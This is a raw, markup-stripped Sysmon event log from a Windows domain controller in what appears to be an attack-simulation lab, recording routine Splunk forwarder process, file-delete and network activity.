13:55:18.226{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200787Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:18.226{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200786Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:18.226{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200785Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:18.226{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200784Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:18.226{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E6C6-6040-EA4D-00000000AD01}2908C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200783Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:18.226{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E6C6-6040-EA4D-00000000AD01}2908C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200782Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:18.227{5ABCFE62-E6C6-6040-EA4D-00000000AD01}2908C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200811Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:19.867{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8318ECD44A430F465C0281BAD62D72AD,SHA256=A5B72C92AB0C4CAB0DC49EEBE21378A07AE9DBF8384C073F13684348CD729F6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200810Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:19.835{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=83E406432B50CEED7FD52D232498FFC6,SHA256=4A27812F0DD1AF07DDC02ED8FEF0F4F7F474BDE8A17669ECC418C40EC8AAEBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200809Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:19.617{5ABCFE62-E6C7-6040-EC4D-00000000AD01}59845056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200808Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:19.492{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E6C7-6040-EC4D-00000000AD01}5984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200807Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:19.492{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200806Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:19.492{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200805Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:19.492{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200804Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:19.492{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200803Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:19.492{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E6C7-6040-EC4D-00000000AD01}5984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200802Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:19.492{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E6C7-6040-EC4D-00000000AD01}5984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200801Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:19.492{5ABCFE62-E6C7-6040-EC4D-00000000AD01}5984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200812Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:20.898{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C47D53BD666043E70061EF9A5455204,SHA256=8C2A74CFA17017512CBB4518F9DAA6AE83C5912A638B0F676FDD3E7C06FF1DD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200814Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:21.913{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39998992DF462007532C747B124E3E85,SHA256=8A5D401F2C1A019B178011B2284D4FA58FA6741990329B234E7DA55A1B336FB2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200813Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:17.063{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55155-false10.0.1.12-8000- 23542300x80000000000000002200816Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:22.945{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0278194CD9ECC94357CB89C447B89A9,SHA256=7E103D9DA101AB30C3052F3AAD9F29274B4246AA4D5FCAF7EE7BF02D1B2A6E3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200815Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:22.195{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=B4D372BDD238E4E321C646388A321CF8,SHA256=41ED140FF50DA4F947F8BF61FFB79FA7DC39B6413C3E42B163C6F786B2A128B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200817Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:23.960{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DFF49DE517B5AF2E44D19272463D0C6,SHA256=2869CA18F9F7439BED8499320BD2DE991387E87F71B9682ACC3745F2C8F0B3FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200819Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:24.976{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2CFBF40AFB669BC58D98D0F12792335,SHA256=A7AABA6143243C13112A5F4BEED1A8D881BAF97DD75F1071061E0785CC8F72D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200818Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:24.679{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D7CB591D11F5454CC0502440B918AB44,SHA256=7A013899B146F09A1D29B2AE04B563F7EEEFBCD3DC65F3A90A32E5E7C55E7405,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200820Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:25.992{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D722CEEEE93C9961BDF49584A185774F,SHA256=C800DC85212CFF3F8D3D8AB54971BFB50ACA50EBE347B6A3841C0B6A8B70D5BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200823Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:26.992{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F13887F076E5F10AAFAB551B16A91A6A,SHA256=D293F527D7BA6A358EA1CC356FBD23F8354F757AA0173D84A251F8C909DFA1DC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200822Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:22.922{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55156-false10.0.1.12-8000- 23542300x80000000000000002200821Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:26.117{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1438849FA0C6ED891417FDDC6BC9C938,SHA256=F17975C615F7D63F861607E622C66BAD6840E69BCC946CF53FAAB3F491A878DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200825Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:27.992{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6119F93354B3E46EDA1774F9DCF878AA,SHA256=BB264E4DA02137C49CB08D0797E946F130DCA19FE0FFE6D248456D277CBFD9BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200824Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:27.867{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=797F84E34B4B621769F7F7E1CB10A4F0,SHA256=A4E9CF4649C3E063B5661F6E81DDF2283CA7D4079F99A77E61CB60391033C9F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200826Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:28.742{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4364BB7F95C60F51F6ABB7BE094CF986,SHA256=4123285033FFC484AA76A6B11AC91375595D8D45941E85692E6575441B6C3306,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200827Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:29.007{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F7E0CDCC5A88DBD3E9CB1D5B37D2EC3,SHA256=6F6468AE82E30E7A4899D28E44F118640581341EC2289EFB0B207C2BBFD684EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200828Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:30.023{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7C47E53988A0DC33CB24F3669172C19,SHA256=27133F5DA6ED3B3169F87F2231C534D5E615535B93884C0312AA2578F1F6167E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200831Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:27.954{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55158-false10.0.1.12-8000- 23542300x80000000000000002200830Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:31.118{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1E091B2FA28AB69E2DC4AC2DA1E49E23,SHA256=8A30EB144D88DF01147937EF39760402485FE7F94E70273E881366B03B9A46CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200829Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:31.024{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A2E2C2E5FA772577F5CC4B3C15B49B6,SHA256=4EFDBFD332CE557E4EACE9B3C86ADF1028D08CB0EE917FF2CD55FEB305D963B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200833Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:32.555{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program 